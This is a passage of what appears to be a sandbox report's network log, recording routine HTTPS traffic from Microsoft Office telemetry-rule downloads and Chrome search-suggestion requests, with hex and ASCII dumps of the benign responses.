                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f37cb76d-d01e-0017-2085-3ab035000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095423Z-185f5d8b95c95vpshC1NYC759c00000009y000000000m9gz
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      59192.168.2.64976913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095423Z-r1d97b99577n5jhbhC1TEB74vn00000008q0000000005azv
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      60192.168.2.64977113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 38897a0b-401e-000a-7a8c-3a4a7b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095423Z-185f5d8b95cjbkr4hC1NYCeu240000000a00000000001pe6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      61192.168.2.64977013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                      x-ms-request-id: af4852c5-601e-000d-3a8c-3a2618000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095423Z-185f5d8b95c4hl5whC1NYCeex00000000a200000000028ef
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      62192.168.2.64977213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 502
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095423Z-1777c6cb754gc8g6hC1TEB966c00000009fg000000003evc
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      63192.168.2.649776142.250.184.2284433524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:23 GMT
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-O0rn5kKWZ9OAshxXp3h9gg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC124INData Raw: 61 30 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 69 67 68 20 70 6f 74 65 6e 74 69 61 6c 20 6e 65 77 20 65 70 69 73 6f 64 65 73 22 2c 22 62 6c 61 63 6b 20 66 72 69 64 61 79 20 64 65 61 6c 73 20 70 73 35 22 2c 22 6e 62 61 20 62 61 73 6b 65 74 62 61 6c 6c 22 2c 22 6d 63 64 6f 6e 61 6c 64 73 20 74 68 65 20 67 72 69 6e 63 68 20 68 61 70 70 79 20 6d 65 61 6c 22 2c 22 61 72
                                                                                                                                                                                                                                                                                      Data Ascii: a00)]}'["",["high potential new episodes","black friday deals ps5","nba basketball","mcdonalds the grinch happy meal","ar
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC1390INData Raw: 63 61 6e 65 20 6a 69 6e 78 20 66 69 78 65 73 20 65 76 65 72 79 74 68 69 6e 67 20 61 63 74 20 32 20 63 6f 64 65 22 2c 22 62 6f 73 74 6f 6e 20 75 6e 69 76 65 72 73 69 74 79 20 73 75 73 70 65 6e 64 73 20 61 64 6d 69 73 73 69 6f 6e 73 22 2c 22 6d 61 67 6e 65 74 69 63 20 6e 6f 72 74 68 20 70 6f 6c 65 20 6d 6f 76 69 6e 67 22 2c 22 61 70 70 6c 65 20 69 6f 73 20 31 38 2e 31 20 31 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d
                                                                                                                                                                                                                                                                                      Data Ascii: cane jinx fixes everything act 2 code","boston university suspends admissions","magnetic north pole moving","apple ios 18.1 1"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhcm
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC1053INData Raw: 46 50 55 45 4a 30 4e 32 39 6d 63 45 38 76 64 6b 78 45 51 56 46 44 4e 6e 4e 6a 55 45 51 33 4d 57 52 75 52 44 46 6c 4e 47 70 45 53 56 68 46 57 44 64 75 52 6c 70 6d 55 55 35 72 59 32 45 76 56 46 4e 6b 4f 48 70 44 4d 6b 6c 79 62 6d 64 4e 5a 6c 46 34 65 6a 4a 74 56 6c 42 30 65 45 6c 56 63 30 74 34 65 46 68 43 4d 45 70 4d 4e 6b 78 61 56 6b 78 6a 54 30 5a 50 54 56 6c 74 4d 6d 39 45 4b 30 52 36 52 6d 6f 77 59 6b 52 77 52 30 56 4b 52 46 56 6d 64 48 55 7a 4d 32 35 4c 56 58 6c 72 65 48 70 77 57 55 6c 71 54 55 56 59 56 45 4d 30 59 7a 4e 70 62 7a 52 46 5a 54 42 6f 64 58 67 32 64 6d 6f 34 5a 6d 6f 72 53 55 46 48 59 30 64 53 52 58 46 79 53 47 70 49 57 58 70 75 63 56 42 5a 56 46 64 4c 4b 30 64 34 54 55 73 72 54 56 42 74 56 46 64 79 51 6a 55 72 62 6d 78 54 55 6a 6b 35 62
                                                                                                                                                                                                                                                                                      Data Ascii: FPUEJ0N29mcE8vdkxEQVFDNnNjUEQ3MWRuRDFlNGpESVhFWDduRlpmUU5rY2EvVFNkOHpDMklybmdNZlF4ejJtVlB0eElVc0t4eFhCMEpMNkxaVkxjT0ZPTVltMm9EK0R6RmowYkRwR0VKRFVmdHUzM25LVXlreHpwWUlqTUVYVEM0YzNpbzRFZTBodXg2dmo4ZmorSUFHY0dSRXFySGpIWXpucVBZVFdLK0d4TUsrTVBtVFdyQjUrbmxTUjk5b
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      64192.168.2.649777142.250.184.2284433524C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:23 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Version: 697526041
                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:24 GMT
                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:24 UTC372INData Raw: 32 33 66 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                      Data Ascii: 23f4)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
